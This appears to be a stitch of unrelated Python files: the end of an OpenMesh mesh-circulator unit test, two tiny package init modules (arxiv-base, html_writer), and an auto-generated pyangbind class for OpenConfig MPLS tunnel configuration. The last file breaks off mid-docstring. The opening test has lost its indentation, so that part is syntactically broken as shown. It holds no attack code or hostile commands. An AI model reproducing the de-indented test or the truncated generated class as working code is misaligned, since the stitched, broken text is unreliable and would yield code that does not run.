face_vhandles.append(self.vhandle[1])
face_vhandles.append(self.vhandle[2])
self.mesh.add_face(face_vhandles)
face_vhandles = []
face_vhandles.append(self.vhandle[1])
face_vhandles.append(self.vhandle[3])
face_vhandles.append(self.vhandle[4])
self.mesh.add_face(face_vhandles)
face_vhandles = []
face_vhandles.append(self.vhandle[0])
face_vhandles.append(self.vhandle[3])
face_vhandles.append(self.vhandle[1])
self.mesh.add_face(face_vhandles)
face_vhandles = []
face_vhandles.append(self.vhandle[2])
face_vhandles.append(self.vhandle[1])
face_vhandles.append(self.vhandle[4])
self.mesh.add_face(face_vhandles)
# Test setup:
# 0 ==== 2
# |\ 0 /|
# | \ / |
# |2 1 3|
# | / \ |
# |/ 1 \|
# 3 ==== 4
# Starting vertex is 1->4
# output from vv_it.current_halfedge_handle()
current_halfedge_handles = [5, 0, 12, 11, 6, 1, 2, 15, 3, 4, 13, 7, 8, 9, 10, 14]
eh0 = []
eh1 = []
i = 0
for v in self.mesh.vertices():
for vv in self.mesh.vv(v):
he = openmesh.HalfedgeHandle(current_halfedge_handles[i])
eh0.append(self.mesh.edge_handle(he))
i += 1
for v in self.mesh.vertices():
for he in self.mesh.voh(v):
eh1.append(self.mesh.edge_handle(he))
self.assertEqual(len(eh0), len(eh1))
for i in range(len(eh0)):
self.assertEqual(eh0[i], eh1[i])
def test_fe_iter(self):
# Add some vertices
self.vhandle.append(self.mesh.add_vertex(openmesh.Vec3d(0, 1, 0)))
self.vhandle.append(self.mesh.add_vertex(openmesh.Vec3d(1, 0, 0)))
self.vhandle.append(self.mesh.add_vertex(openmesh.Vec3d(2, 1, 0)))
self.vhandle.append(self.mesh.add_vertex(openmesh.Vec3d(0, -1, 0)))
self.vhandle.append(self.mesh.add_vertex(openmesh.Vec3d(2, -1, 0)))
# Add four faces
face_vhandles = []
face_vhandles.append(self.vhandle[0])
face_vhandles.append(self.vhandle[1])
face_vhandles.append(self.vhandle[2])
self.mesh.add_face(face_vhandles)
face_vhandles = []
face_vhandles.append(self.vhandle[1])
face_vhandles.append(self.vhandle[3])
face_vhandles.append(self.vhandle[4])
self.mesh.add_face(face_vhandles)
face_vhandles = []
face_vhandles.append(self.vhandle[0])
face_vhandles.append(self.vhandle[3])
face_vhandles.append(self.vhandle[1])
self.mesh.add_face(face_vhandles)
face_vhandles = []
face_vhandles.append(self.vhandle[2])
face_vhandles.append(self.vhandle[1])
face_vhandles.append(self.vhandle[4])
self.mesh.add_face(face_vhandles)
# Test setup:
# 0 ==== 2
# |\ 0 /|
# | \ / |
# |2 1 3|
# | / \ |
# |/ 1 \|
# 3 ==== 4
# Starting vertex is 1->4
# output from fe_it.current_halfedge_handle()
current_halfedge_handles = [4, 0, 2, 10, 6, 8, 1, 12, 7, 14, 3, 11]
heh0 = []
heh1 = []
i = 0
for f in self.mesh.faces():
for e in self.mesh.fe(f):
heh0.append(openmesh.HalfedgeHandle(current_halfedge_handles[i]))
i += 1
for f in self.mesh.faces():
for he in self.mesh.fh(f):
heh1.append(he)
self.assertEqual(len(heh0), len(heh1))
for i in range(len(heh0)):
self.assertEqual(heh0[i], heh1[i])
    def test_vf_iter_boundary(self):
        # Add some vertices
        self.vhandle.append(self.mesh.add_vertex(openmesh.Vec3d(0, 1, 0)))
        self.vhandle.append(self.mesh.add_vertex(openmesh.Vec3d(1, 0, 0)))
        self.vhandle.append(self.mesh.add_vertex(openmesh.Vec3d(2, 1, 0)))
        self.vhandle.append(self.mesh.add_vertex(openmesh.Vec3d(3, 0, 0)))
        self.vhandle.append(self.mesh.add_vertex(openmesh.Vec3d(4, 1, 0)))
        self.vhandle.append(self.mesh.add_vertex(openmesh.Vec3d(2, -1, 0)))

        # Add three faces
        face_vhandles = []
        face_vhandles.append(self.vhandle[0])
        face_vhandles.append(self.vhandle[1])
        face_vhandles.append(self.vhandle[2])
        self.mesh.add_face(face_vhandles)

        face_vhandles = []
        face_vhandles.append(self.vhandle[2])
        face_vhandles.append(self.vhandle[3])
        face_vhandles.append(self.vhandle[4])
        self.mesh.add_face(face_vhandles)

        face_vhandles = []
        face_vhandles.append(self.vhandle[1])
        face_vhandles.append(self.vhandle[5])
        face_vhandles.append(self.vhandle[3])
        self.mesh.add_face(face_vhandles)

        # Test setup:
        #
        # 0 ------ 2 ------ 4
        #  \      / \      /
        #   \ 0  /   \ 1  /
        #    \  /     \  /
        #     1 ------- 3
        #      \       /
        #       \  2  /
        #        \   /
        #         \ /
        #          5

        # output from fe_it.current_halfedge_handle()
        current_halfedge_handles = [0, 2, 12, 4, 6, 8, 16, 10, 14]

        fh0 = []
        fh1 = []
        i = 0
        for v in self.mesh.vertices():
            for f in self.mesh.vf(v):
                he = openmesh.HalfedgeHandle(current_halfedge_handles[i])
                fh0.append(self.mesh.face_handle(he))
                i += 1
        for v in self.mesh.vertices():
            for f in self.mesh.vf(v):
                fh1.append(f)

        self.assertEqual(len(fh0), len(fh1))
        for i in range(len(fh0)):
            self.assertEqual(fh0[i], fh1[i])
if __name__ == '__main__':
    suite = unittest.TestLoader().loadTestsFromTestCase(TrimeshCirculatorCurrentHalfedgeHandleReplacement)
    unittest.TextTestRunner(verbosity=2).run(suite)
# File: arxiv/base/agent.py (repo: ibnesayeed/arxiv-base, license: MIT)
"""Access to :mod:`arxiv.integration.kinesis.consumer` for backward compat."""
from arxiv.integration.kinesis.consumer import *
# File: html_writer/__init__.py (repo: KKawamura1/html-writer, license: MIT)
from html_writer.html_writer import Html, Indent, WriteOutError
from html_writer._version import __version__
# File: napalm_yang/models/openconfig/network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/__init__.py
# (repo: ckishimo/napalm-yang, license: Apache-2.0)
# -*- coding: utf-8 -*-
from operator import attrgetter
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType
from pyangbind.lib.yangtypes import RestrictedClassType
from pyangbind.lib.yangtypes import TypedListType
from pyangbind.lib.yangtypes import YANGBool
from pyangbind.lib.yangtypes import YANGListType
from pyangbind.lib.yangtypes import YANGDynClass
from pyangbind.lib.yangtypes import ReferenceType
from pyangbind.lib.base import PybindBase
from collections import OrderedDict
from decimal import Decimal
from bitarray import bitarray
import six

# PY3 support of some PY2 keywords (needs improvement)
if six.PY3:
    import builtins as __builtin__

    long = int
elif six.PY2:
    import __builtin__
class config(PybindBase):
    """
    This class was auto-generated by the PythonClass plugin for PYANG
    from YANG module openconfig-network-instance - based on the path /network-instances/network-instance/mpls/lsps/constrained-path/tunnels/tunnel/config. Each member element of
    the container is represented as a class variable - with a specific
    YANG type.

    YANG Description: Configuration parameters related to TE tunnels:
    """

    __slots__ = (
        "_path_helper",
        "_extmethods",
        "__name",
        "__type",
        "__signaling_protocol",
        "__description",
        "__admin_status",
        "__preference",
        "__metric_type",
        "__metric",
        "__shortcut_eligible",
        "__protection_style_requested",
        "__reoptimize_timer",
        "__source",
        "__soft_preemption",
        "__setup_priority",
        "__hold_priority",
    )

    _yang_name = "config"
    _pybind_generated_by = "container"
    def __init__(self, *args, **kwargs):
        self._path_helper = False
        self._extmethods = False
        self.__name = YANGDynClass(
            base=six.text_type,
            is_leaf=True,
            yang_name="name",
            parent=self,
            path_helper=self._path_helper,
            extmethods=self._extmethods,
            register_paths=True,
            namespace="http://openconfig.net/yang/network-instance",
            defining_module="openconfig-network-instance",
            yang_type="string",
            is_config=True,
        )
        self.__type = YANGDynClass(
            base=RestrictedClassType(
                base_type=six.text_type,
                restriction_type="dict_key",
                restriction_arg={
                    "P2P": {
                        "@module": "openconfig-mpls-types",
                        "@namespace": "http://openconfig.net/yang/mpls-types",
                    },
                    "oc-mpls-types:P2P": {
                        "@module": "openconfig-mpls-types",
                        "@namespace": "http://openconfig.net/yang/mpls-types",
                    },
                    "oc-mplst:P2P": {
                        "@module": "openconfig-mpls-types",
                        "@namespace": "http://openconfig.net/yang/mpls-types",
                    },
                    "oc-mpls-t:P2P": {
                        "@module": "openconfig-mpls-types",
                        "@namespace": "http://openconfig.net/yang/mpls-types",
                    },
                    "P2MP": {
                        "@module": "openconfig-mpls-types",
                        "@namespace": "http://openconfig.net/yang/mpls-types",
                    },
                    "oc-mpls-types:P2MP": {
                        "@module": "openconfig-mpls-types",
                        "@namespace": "http://openconfig.net/yang/mpls-types",
                    },
                    "oc-mplst:P2MP": {
                        "@module": "openconfig-mpls-types",
                        "@namespace": "http://openconfig.net/yang/mpls-types",
                    },
                    "oc-mpls-t:P2MP": {
                        "@module": "openconfig-mpls-types",
                        "@namespace": "http://openconfig.net/yang/mpls-types",
                    },
                },
            ),
            is_leaf=True,
            yang_name="type",
            parent=self,
            path_helper=self._path_helper,
            extmethods=self._extmethods,
            register_paths=True,
            namespace="http://openconfig.net/yang/network-instance",
            defining_module="openconfig-network-instance",
            yang_type="identityref",
            is_config=True,
        )
        self.__signaling_protocol = YANGDynClass(
            base=RestrictedClassType(
                base_type=six.text_type,
                restriction_type="dict_key",
                restriction_arg={
                    "PATH_SETUP_RSVP": {
                        "@module": "openconfig-mpls-types",
                        "@namespace": "http://openconfig.net/yang/mpls-types",
                    },
                    "oc-mpls-types:PATH_SETUP_RSVP": {
                        "@module": "openconfig-mpls-types",
                        "@namespace": "http://openconfig.net/yang/mpls-types",
                    },
                    "oc-mplst:PATH_SETUP_RSVP": {
                        "@module": "openconfig-mpls-types",
                        "@namespace": "http://openconfig.net/yang/mpls-types",
                    },
                    "oc-mpls-t:PATH_SETUP_RSVP": {
                        "@module": "openconfig-mpls-types",
                        "@namespace": "http://openconfig.net/yang/mpls-types",
                    },
                    "PATH_SETUP_SR": {
                        "@module": "openconfig-mpls-types",
                        "@namespace": "http://openconfig.net/yang/mpls-types",
                    },
                    "oc-mpls-types:PATH_SETUP_SR": {
                        "@module": "openconfig-mpls-types",
                        "@namespace": "http://openconfig.net/yang/mpls-types",
                    },
                    "oc-mplst:PATH_SETUP_SR": {
                        "@module": "openconfig-mpls-types",
                        "@namespace": "http://openconfig.net/yang/mpls-types",
                    },
                    "oc-mpls-t:PATH_SETUP_SR": {
                        "@module": "openconfig-mpls-types",
                        "@namespace": "http://openconfig.net/yang/mpls-types",
                    },
                    "PATH_SETUP_LDP": {
                        "@module": "openconfig-mpls-types",
                        "@namespace": "http://openconfig.net/yang/mpls-types",
                    },
                    "oc-mpls-types:PATH_SETUP_LDP": {
                        "@module": "openconfig-mpls-types",
                        "@namespace": "http://openconfig.net/yang/mpls-types",
                    },
                    "oc-mplst:PATH_SETUP_LDP": {
                        "@module": "openconfig-mpls-types",
                        "@namespace": "http://openconfig.net/yang/mpls-types",
                    },
                    "oc-mpls-t:PATH_SETUP_LDP": {
                        "@module": "openconfig-mpls-types",
                        "@namespace": "http://openconfig.net/yang/mpls-types",
                    },
                },
            ),
            is_leaf=True,
            yang_name="signaling-protocol",
            parent=self,
            path_helper=self._path_helper,
            extmethods=self._extmethods,
            register_paths=True,
            namespace="http://openconfig.net/yang/network-instance",
            defining_module="openconfig-network-instance",
            yang_type="identityref",
            is_config=True,
        )
        self.__description = YANGDynClass(
            base=six.text_type,
            is_leaf=True,
            yang_name="description",
            parent=self,
            path_helper=self._path_helper,
            extmethods=self._extmethods,
            register_paths=True,
            namespace="http://openconfig.net/yang/network-instance",
            defining_module="openconfig-network-instance",
            yang_type="string",
            is_config=True,
        )
        self.__admin_status = YANGDynClass(
            base=RestrictedClassType(
                base_type=six.text_type,
                restriction_type="dict_key",
                restriction_arg={
                    "ADMIN_DOWN": {
                        "@module": "openconfig-mpls-types",
                        "@namespace": "http://openconfig.net/yang/mpls-types",
                    },
                    "oc-mpls-types:ADMIN_DOWN": {
                        "@module": "openconfig-mpls-types",
                        "@namespace": "http://openconfig.net/yang/mpls-types",
                    },
                    "oc-mplst:ADMIN_DOWN": {
                        "@module": "openconfig-mpls-types",
                        "@namespace": "http://openconfig.net/yang/mpls-types",
                    },
                    "oc-mpls-t:ADMIN_DOWN": {
                        "@module": "openconfig-mpls-types",
                        "@namespace": "http://openconfig.net/yang/mpls-types",
                    },
                    "ADMIN_UP": {
                        "@module": "openconfig-mpls-types",
                        "@namespace": "http://openconfig.net/yang/mpls-types",
                    },
                    "oc-mpls-types:ADMIN_UP": {
                        "@module": "openconfig-mpls-types",
                        "@namespace": "http://openconfig.net/yang/mpls-types",
                    },
                    "oc-mplst:ADMIN_UP": {
                        "@module": "openconfig-mpls-types",
                        "@namespace": "http://openconfig.net/yang/mpls-types",
                    },
                    "oc-mpls-t:ADMIN_UP": {
                        "@module": "openconfig-mpls-types",
                        "@namespace": "http://openconfig.net/yang/mpls-types",
                    },
                },
            ),
            default=six.text_type("oc-mplst:ADMIN_UP"),
            is_leaf=True,
            yang_name="admin-status",
            parent=self,
            path_helper=self._path_helper,
            extmethods=self._extmethods,
            register_paths=True,
            namespace="http://openconfig.net/yang/network-instance",
            defining_module="openconfig-network-instance",
            yang_type="identityref",
            is_config=True,
        )
        self.__preference = YANGDynClass(
            base=RestrictedClassType(
                base_type=RestrictedClassType(
                    base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
                ),
                restriction_dict={"range": ["1..255"]},
            ),
            is_leaf=True,
            yang_name="preference",
            parent=self,
            path_helper=self._path_helper,
            extmethods=self._extmethods,
            register_paths=True,
            namespace="http://openconfig.net/yang/network-instance",
            defining_module="openconfig-network-instance",
            yang_type="uint8",
            is_config=True,
        )
        self.__metric_type = YANGDynClass(
            base=RestrictedClassType(
                base_type=six.text_type,
                restriction_type="dict_key",
                restriction_arg={
                    "LSP_METRIC_RELATIVE": {
                        "@module": "openconfig-mpls-types",
                        "@namespace": "http://openconfig.net/yang/mpls-types",
                    },
                    "oc-mpls-types:LSP_METRIC_RELATIVE": {
                        "@module": "openconfig-mpls-types",
                        "@namespace": "http://openconfig.net/yang/mpls-types",
                    },
                    "oc-mplst:LSP_METRIC_RELATIVE": {
                        "@module": "openconfig-mpls-types",
                        "@namespace": "http://openconfig.net/yang/mpls-types",
                    },
                    "oc-mpls-t:LSP_METRIC_RELATIVE": {
                        "@module": "openconfig-mpls-types",
                        "@namespace": "http://openconfig.net/yang/mpls-types",
                    },
                    "LSP_METRIC_ABSOLUTE": {
                        "@module": "openconfig-mpls-types",
                        "@namespace": "http://openconfig.net/yang/mpls-types",
                    },
                    "oc-mpls-types:LSP_METRIC_ABSOLUTE": {
                        "@module": "openconfig-mpls-types",
                        "@namespace": "http://openconfig.net/yang/mpls-types",
                    },
                    "oc-mplst:LSP_METRIC_ABSOLUTE": {
                        "@module": "openconfig-mpls-types",
                        "@namespace": "http://openconfig.net/yang/mpls-types",
                    },
                    "oc-mpls-t:LSP_METRIC_ABSOLUTE": {
                        "@module": "openconfig-mpls-types",
                        "@namespace": "http://openconfig.net/yang/mpls-types",
                    },
                    "LSP_METRIC_INHERITED": {
                        "@module": "openconfig-mpls-types",
                        "@namespace": "http://openconfig.net/yang/mpls-types",
                    },
                    "oc-mpls-types:LSP_METRIC_INHERITED": {
                        "@module": "openconfig-mpls-types",
                        "@namespace": "http://openconfig.net/yang/mpls-types",
                    },
                    "oc-mplst:LSP_METRIC_INHERITED": {
                        "@module": "openconfig-mpls-types",
                        "@namespace": "http://openconfig.net/yang/mpls-types",
                    },
                    "oc-mpls-t:LSP_METRIC_INHERITED": {
                        "@module": "openconfig-mpls-types",
                        "@namespace": "http://openconfig.net/yang/mpls-types",
                    },
                },
            ),
            default=six.text_type("oc-mplst:LSP_METRIC_INHERITED"),
            is_leaf=True,
            yang_name="metric-type",
            parent=self,
            path_helper=self._path_helper,
            extmethods=self._extmethods,
            register_paths=True,
            namespace="http://openconfig.net/yang/network-instance",
            defining_module="openconfig-network-instance",
            yang_type="identityref",
            is_config=True,
        )
        self.__metric = YANGDynClass(
            base=RestrictedClassType(
                base_type=long,
                restriction_dict={"range": ["-2147483648..2147483647"]},
                int_size=32,
            ),
            is_leaf=True,
            yang_name="metric",
            parent=self,
            path_helper=self._path_helper,
            extmethods=self._extmethods,
            register_paths=True,
            namespace="http://openconfig.net/yang/network-instance",
            defining_module="openconfig-network-instance",
            yang_type="int32",
            is_config=True,
        )
        self.__shortcut_eligible = YANGDynClass(
            base=YANGBool,
            default=YANGBool("true"),
            is_leaf=True,
            yang_name="shortcut-eligible",
            parent=self,
            path_helper=self._path_helper,
            extmethods=self._extmethods,
            register_paths=True,
            namespace="http://openconfig.net/yang/network-instance",
            defining_module="openconfig-network-instance",
            yang_type="boolean",
            is_config=True,
        )
        self.__protection_style_requested = YANGDynClass(
            base=RestrictedClassType(
                base_type=six.text_type,
                restriction_type="dict_key",
                restriction_arg={
                    "UNPROTECTED": {
                        "@module": "openconfig-mpls-types",
                        "@namespace": "http://openconfig.net/yang/mpls-types",
                    },
                    "oc-mpls-types:UNPROTECTED": {
                        "@module": "openconfig-mpls-types",
                        "@namespace": "http://openconfig.net/yang/mpls-types",
                    },
                    "oc-mplst:UNPROTECTED": {
                        "@module": "openconfig-mpls-types",
                        "@namespace": "http://openconfig.net/yang/mpls-types",
                    },
                    "oc-mpls-t:UNPROTECTED": {
                        "@module": "openconfig-mpls-types",
                        "@namespace": "http://openconfig.net/yang/mpls-types",
                    },
                    "LINK_PROTECTION_REQUIRED": {
                        "@module": "openconfig-mpls-types",
                        "@namespace": "http://openconfig.net/yang/mpls-types",
                    },
                    "oc-mpls-types:LINK_PROTECTION_REQUIRED": {
                        "@module": "openconfig-mpls-types",
                        "@namespace": "http://openconfig.net/yang/mpls-types",
                    },
                    "oc-mplst:LINK_PROTECTION_REQUIRED": {
                        "@module": "openconfig-mpls-types",
                        "@namespace": "http://openconfig.net/yang/mpls-types",
                    },
                    "oc-mpls-t:LINK_PROTECTION_REQUIRED": {
                        "@module": "openconfig-mpls-types",
                        "@namespace": "http://openconfig.net/yang/mpls-types",
                    },
                    "LINK_NODE_PROTECTION_REQUESTED": {
                        "@module": "openconfig-mpls-types",
                        "@namespace": "http://openconfig.net/yang/mpls-types",
                    },
                    "oc-mpls-types:LINK_NODE_PROTECTION_REQUESTED": {
                        "@module": "openconfig-mpls-types",
                        "@namespace": "http://openconfig.net/yang/mpls-types",
                    },
                    "oc-mplst:LINK_NODE_PROTECTION_REQUESTED": {
                        "@module": "openconfig-mpls-types",
                        "@namespace": "http://openconfig.net/yang/mpls-types",
                    },
                    "oc-mpls-t:LINK_NODE_PROTECTION_REQUESTED": {
                        "@module": "openconfig-mpls-types",
                        "@namespace": "http://openconfig.net/yang/mpls-types",
                    },
                },
            ),
            default=six.text_type("oc-mplst:UNPROTECTED"),
            is_leaf=True,
            yang_name="protection-style-requested",
            parent=self,
            path_helper=self._path_helper,
            extmethods=self._extmethods,
            register_paths=True,
            namespace="http://openconfig.net/yang/network-instance",
            defining_module="openconfig-network-instance",
            yang_type="identityref",
            is_config=True,
        )
        self.__reoptimize_timer = YANGDynClass(
            base=RestrictedClassType(
                base_type=int, restriction_dict={"range": ["0..65535"]}, int_size=16
            ),
            is_leaf=True,
            yang_name="reoptimize-timer",
            parent=self,
            path_helper=self._path_helper,
            extmethods=self._extmethods,
            register_paths=True,
            namespace="http://openconfig.net/yang/network-instance",
            defining_module="openconfig-network-instance",
            yang_type="uint16",
            is_config=True,
        )
        self.__source = YANGDynClass(
            base=[
                RestrictedClassType(
                    base_type=six.text_type,
                    restriction_dict={
                        "pattern": "(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?"
                    },
                ),
                RestrictedClassType(
                    base_type=six.text_type,
                    restriction_dict={
                        "pattern": "((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?"
                    },
                ),
            ],
            is_leaf=True,
            yang_name="source",
            parent=self,
            path_helper=self._path_helper,
            extmethods=self._extmethods,
            register_paths=True,
            namespace="http://openconfig.net/yang/network-instance",
            defining_module="openconfig-network-instance",
            yang_type="inet:ip-address",
            is_config=True,
        )
        self.__soft_preemption = YANGDynClass(
            base=YANGBool,
            default=YANGBool("false"),
            is_leaf=True,
            yang_name="soft-preemption",
            parent=self,
            path_helper=self._path_helper,
            extmethods=self._extmethods,
            register_paths=True,
            namespace="http://openconfig.net/yang/network-instance",
            defining_module="openconfig-network-instance",
            yang_type="boolean",
            is_config=True,
        )
        self.__setup_priority = YANGDynClass(
            base=RestrictedClassType(
                base_type=RestrictedClassType(
                    base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
                ),
                restriction_dict={"range": ["0..7"]},
            ),
            default=RestrictedClassType(
                base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
            )(7),
            is_leaf=True,
            yang_name="setup-priority",
            parent=self,
            path_helper=self._path_helper,
            extmethods=self._extmethods,
            register_paths=True,
            namespace="http://openconfig.net/yang/network-instance",
            defining_module="openconfig-network-instance",
            yang_type="uint8",
            is_config=True,
        )
        self.__hold_priority = YANGDynClass(
            base=RestrictedClassType(
                base_type=RestrictedClassType(
                    base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
                ),
                restriction_dict={"range": ["0..7"]},
            ),
            default=RestrictedClassType(
                base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
            )(0),
            is_leaf=True,
            yang_name="hold-priority",
            parent=self,
            path_helper=self._path_helper,
            extmethods=self._extmethods,
            register_paths=True,
            namespace="http://openconfig.net/yang/network-instance",
            defining_module="openconfig-network-instance",
            yang_type="uint8",
            is_config=True,
        )
        load = kwargs.pop("load", None)
        if args:
            if len(args) > 1:
                raise TypeError("cannot create a YANG container with >1 argument")
            all_attr = True
            for e in self._pyangbind_elements:
                if not hasattr(args[0], e):
                    all_attr = False
                    break
            if not all_attr:
                raise ValueError("Supplied object did not have the correct attributes")
            for e in self._pyangbind_elements:
                nobj = getattr(args[0], e)
                if nobj._changed() is False:
                    continue
                setmethod = getattr(self, "_set_%s" % e)
                if load is None:
                    setmethod(getattr(args[0], e))
                else:
                    setmethod(getattr(args[0], e), load=load)

    def _path(self):
        if hasattr(self, "_parent"):
            return self._parent._path() + [self._yang_name]
        else:
            return [
                "network-instances",
                "network-instance",
                "mpls",
                "lsps",
                "constrained-path",
                "tunnels",
                "tunnel",
                "config",
            ]
    def _get_name(self):
        """
        Getter method for name, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/name (string)

        YANG Description: The tunnel name
        """
        return self.__name

    def _set_name(self, v, load=False):
        """
        Setter method for name, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/name (string)
        If this variable is read-only (config: false) in the
        source YANG file, then _set_name is considered as a private
        method. Backends looking to populate this variable should
        do so via calling thisObj._set_name() directly.

        YANG Description: The tunnel name
        """
        if hasattr(v, "_utype"):
            v = v._utype(v)
        try:
            t = YANGDynClass(
                v,
                base=six.text_type,
                is_leaf=True,
                yang_name="name",
                parent=self,
                path_helper=self._path_helper,
                extmethods=self._extmethods,
                register_paths=True,
                namespace="http://openconfig.net/yang/network-instance",
                defining_module="openconfig-network-instance",
                yang_type="string",
                is_config=True,
            )
        except (TypeError, ValueError):
            raise ValueError(
                {
                    "error-string": """name must be of a type compatible with string""",
                    "defined-type": "string",
                    "generated-type": """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='string', is_config=True)""",
                }
            )

        self.__name = t
        if hasattr(self, "_set"):
            self._set()

    def _unset_name(self):
        self.__name = YANGDynClass(
            base=six.text_type,
            is_leaf=True,
            yang_name="name",
            parent=self,
            path_helper=self._path_helper,
            extmethods=self._extmethods,
            register_paths=True,
            namespace="http://openconfig.net/yang/network-instance",
            defining_module="openconfig-network-instance",
            yang_type="string",
            is_config=True,
        )
    def _get_type(self):
        """
        Getter method for type, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/type (identityref)

        YANG Description: Tunnel type, p2p or p2mp
        """
        return self.__type

    def _set_type(self, v, load=False):
        """
        Setter method for type, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/type (identityref)
        If this variable is read-only (config: false) in the
        source YANG file, then _set_type is considered as a private
        method. Backends looking to populate this variable should
        do so via calling thisObj._set_type() directly.

        YANG Description: Tunnel type, p2p or p2mp
        """
        if hasattr(v, "_utype"):
            v = v._utype(v)
        try:
            t = YANGDynClass(
                v,
                base=RestrictedClassType(
                    base_type=six.text_type,
                    restriction_type="dict_key",
                    restriction_arg={
                        "P2P": {
                            "@module": "openconfig-mpls-types",
                            "@namespace": "http://openconfig.net/yang/mpls-types",
                        },
                        "oc-mpls-types:P2P": {
                            "@module": "openconfig-mpls-types",
                            "@namespace": "http://openconfig.net/yang/mpls-types",
                        },
                        "oc-mplst:P2P": {
                            "@module": "openconfig-mpls-types",
                            "@namespace": "http://openconfig.net/yang/mpls-types",
                        },
                        "oc-mpls-t:P2P": {
                            "@module": "openconfig-mpls-types",
                            "@namespace": "http://openconfig.net/yang/mpls-types",
                        },
                        "P2MP": {
                            "@module": "openconfig-mpls-types",
                            "@namespace": "http://openconfig.net/yang/mpls-types",
                        },
                        "oc-mpls-types:P2MP": {
                            "@module": "openconfig-mpls-types",
                            "@namespace": "http://openconfig.net/yang/mpls-types",
                        },
                        "oc-mplst:P2MP": {
                            "@module": "openconfig-mpls-types",
                            "@namespace": "http://openconfig.net/yang/mpls-types",
                        },
                        "oc-mpls-t:P2MP": {
                            "@module": "openconfig-mpls-types",
                            "@namespace": "http://openconfig.net/yang/mpls-types",
                        },
                    },
                ),
                is_leaf=True,
                yang_name="type",
                parent=self,
                path_helper=self._path_helper,
                extmethods=self._extmethods,
                register_paths=True,
                namespace="http://openconfig.net/yang/network-instance",
                defining_module="openconfig-network-instance",
                yang_type="identityref",
                is_config=True,
            )
        except (TypeError, ValueError):
            raise ValueError(
                {
                    "error-string": """type must be of a type compatible with identityref""",
                    "defined-type": "openconfig-network-instance:identityref",
                    "generated-type": """YANGDynClass(base=RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'P2P': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-types:P2P': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mplst:P2P': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-t:P2P': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'P2MP': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-types:P2MP': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mplst:P2MP': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-t:P2MP': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}},), is_leaf=True, yang_name="type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='identityref', is_config=True)""",
                }
            )

        self.__type = t
        if hasattr(self, "_set"):
            self._set()

    def _unset_type(self):
        self.__type = YANGDynClass(
            base=RestrictedClassType(
                base_type=six.text_type,
                restriction_type="dict_key",
                restriction_arg={
                    "P2P": {
                        "@module": "openconfig-mpls-types",
                        "@namespace": "http://openconfig.net/yang/mpls-types",
                    },
                    "oc-mpls-types:P2P": {
                        "@module": "openconfig-mpls-types",
                        "@namespace": "http://openconfig.net/yang/mpls-types",
                    },
                    "oc-mplst:P2P": {
                        "@module": "openconfig-mpls-types",
                        "@namespace": "http://openconfig.net/yang/mpls-types",
                    },
                    "oc-mpls-t:P2P": {
                        "@module": "openconfig-mpls-types",
                        "@namespace": "http://openconfig.net/yang/mpls-types",
                    },
                    "P2MP": {
                        "@module": "openconfig-mpls-types",
                        "@namespace": "http://openconfig.net/yang/mpls-types",
                    },
                    "oc-mpls-types:P2MP": {
                        "@module": "openconfig-mpls-types",
                        "@namespace": "http://openconfig.net/yang/mpls-types",
                    },
                    "oc-mplst:P2MP": {
                        "@module": "openconfig-mpls-types",
                        "@namespace": "http://openconfig.net/yang/mpls-types",
                    },
                    "oc-mpls-t:P2MP": {
                        "@module": "openconfig-mpls-types",
                        "@namespace": "http://openconfig.net/yang/mpls-types",
                    },
                },
            ),
            is_leaf=True,
            yang_name="type",
            parent=self,
            path_helper=self._path_helper,
            extmethods=self._extmethods,
            register_paths=True,
            namespace="http://openconfig.net/yang/network-instance",
            defining_module="openconfig-network-instance",
            yang_type="identityref",
            is_config=True,
        )
    def _get_signaling_protocol(self):
        """
        Getter method for signaling_protocol, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/signaling_protocol (identityref)

        YANG Description: Signaling protocol used to set up this tunnel
        """
        return self.__signaling_protocol

    def _set_signaling_protocol(self, v, load=False):
        """
        Setter method for signaling_protocol, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/signaling_protocol (identityref)
        If this variable is read-only (config: false) in the
        source YANG file, then _set_signaling_protocol is considered as a private
        method. Backends looking to populate this variable should
